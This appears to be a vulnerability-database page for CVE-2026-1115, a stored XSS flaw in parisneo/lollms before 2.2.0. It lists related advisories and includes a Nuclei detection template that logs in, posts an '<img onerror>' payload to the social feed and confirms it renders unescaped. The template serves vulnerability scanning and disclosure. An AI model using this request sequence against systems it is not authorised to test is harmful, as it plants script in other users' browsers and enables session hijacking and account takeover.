parisneo/lollms < 2.2.0 - Authenticated Stored XSS
| Reporter | Title | Published | Views | Family All 18 |
|---|---|---|---|---|
| Stored XSS in Home Feed via Post Content Lead to Account Takeover | 10 Jan 202606:22 | – | huntr | |
| CVE-2026-1115 | 10 Apr 202606:23 | – | attackerkb | |
| The vulnerability of the create_post() function in the system for launching and managing large language models of LoLLMS (Lord of Large Language Multimodal Systems) allows attackers to perform XSS attacks. | 12 May 202600:00 | – | bdu_fstec | |
| CVE-2026-1115 | 10 Apr 202607:18 | – | circl | |
| LoLLMs 安全漏洞 | 10 Apr 202600:00 | – | cnnvd | |
| CVE-2026-1115 | 10 Apr 202606:23 | – | cve | |
| CVE-2026-1115 Stored XSS in parisneo/lollms | 10 Apr 202606:23 | – | cvelist | |
| EUVD-2026-21320 | 10 Apr 202609:31 | – | euvd | |
| parisneo/lollms vulnerable to stored XSS in the social feature | 10 Apr 202609:31 | – | github | |
| CVE-2026-1115 | 10 Apr 202607:16 | – | nvd |
10
id: CVE-2026-1115
info:
name: parisneo/lollms < 2.2.0 - Authenticated Stored XSS
author: str4k3r
severity: high
description: |
parisneo/lollms < 2.2.0 contains a stored XSS caused by unsanitized user input in create_post function in backend/routers/social/__init__.py, letting attackers inject malicious scripts executed in user browsers, exploit requires crafted post submission.
impact: |
Attackers can execute malicious scripts in user browsers, leading to account takeover, session hijacking, and wormable attacks.
remediation: |
Update to version 2.2.0 or later.
reference:
- https://github.com/parisneo/lollms/commit/9767b882dbc893c388a286856beeaead69b8292a
- https://huntr.com/bounties/099aa4fe-7165-4337-889c-3fb4f1aa71aa
- https://nvd.nist.gov/vuln/detail/CVE-2026-1115
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H
cvss-score: 9.0
cve-id: CVE-2026-1115
cwe-id: CWE-79
metadata:
verified: true
max-request: 4
vendor: parisneo
product: lollms
shodan-query: http.title:"LoLLMs"
fofa-query: title="LoLLMs"
tags: cve,cve2026,lollms,ai,xss,stored,authenticated,intrusive
variables:
marker: "{{rand_base(8)}}"
flow: http(1) && http(2) && http(3) && http(4)
http:
- raw:
- |
POST /api/auth/token HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
username={{url_encode(username)}}&password={{url_encode(password)}}
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(body, "access_token")'
condition: and
internal: true
extractors:
- type: json
name: access_token
part: body
internal: true
json:
- '.access_token'
- raw:
- |
POST /api/social/posts HTTP/1.1
Host: {{Hostname}}
Authorization: Bearer {{access_token}}
Content-Type: application/json
{"content":"CVE20261115{{marker}} <img src=x onerror=alert(document.domain)>","visibility":"public","media":[]}
matchers:
- type: dsl
dsl:
- 'status_code == 201'
internal: true
extractors:
- type: json
name: post_id
part: body
internal: true
json:
- '.id'
- raw:
- |
GET /api/social/feed HTTP/1.1
Host: {{Hostname}}
Authorization: Bearer {{access_token}}
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains_all(body, "CVE20261115{{marker}}", "<img src=x onerror=alert(document.domain)>")'
condition: and
# digest: 490a004630440220650443d27b6b31890122708f5b8404f6e8a60c3033120b53eeae4dd0230d8dcc02207a5515b4e3eb4201a737f0108d7c26c27f4df571e7702979cad894cdc133e944:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
11 Aug 2026 21:40Current
8.4High risk
Vulners AI Score8.4
CVSS 39.6
EPSS0.00405
SSVC